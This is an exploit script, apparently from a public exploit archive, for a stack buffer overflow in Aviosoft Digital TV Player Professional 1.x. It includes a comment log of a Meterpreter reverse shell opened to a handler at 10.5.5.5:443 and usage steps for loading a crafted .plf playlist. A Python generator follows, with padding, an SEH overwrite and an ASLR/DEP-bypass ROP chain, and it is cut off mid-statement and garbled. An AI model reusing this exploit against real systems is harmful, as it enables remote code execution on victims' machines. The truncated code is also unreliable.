# Exploit Title: Aviosoft Digital TV Player Professional 1.x Stack Buffer Overflow # Author: modpr0be # Software Download: http://www.aviosoft.com/download.php?product=dtvplayerpro # Date: 08/11/2011 # Tested on: Windows XP SP3, Windows 7 SP1 # Thanks: corelanc0d3r, cyb3r.anbu, otoy, sickness, 5m7x, loneferret, _sinn3r, mr_me # # msf exploit(handler) > exploit # # [*] Started reverse handler on 10.5.5.5:443 # [*] Starting the payload handler... # [*] Sending stage (752128 bytes) to 10.5.5.14 # [*] Meterpreter session 1 opened (10.5.5.5:443 -> 10.5.5.14:49592) at 2011-09-27 21:15:34 +0700 # # meterpreter > sysinfo # Computer : M1ABRAMS # OS : Windows 7 (Build 7601, Service Pack 1). # Architecture : x86 # System Language : en_US # Meterpreter : x86/win32 # meterpreter > # # but this time, it will pop up calc # How to: # open aviosoft digital tv player --> load playlist --> choose adtv_bof.plf --> calc # it's generated using mona.py with some modifications ;) thx corelanc0d3r #!/usr/bin/python import struct file = 'adtv_bof.plf' totalsize = 5000 junk = 'A' * 872 align = 'B' * 136 # aslr, dep bypass using pushad technique seh = struct.pack(' ebx rop+= struct.pack(' edx rop+= struct.pack('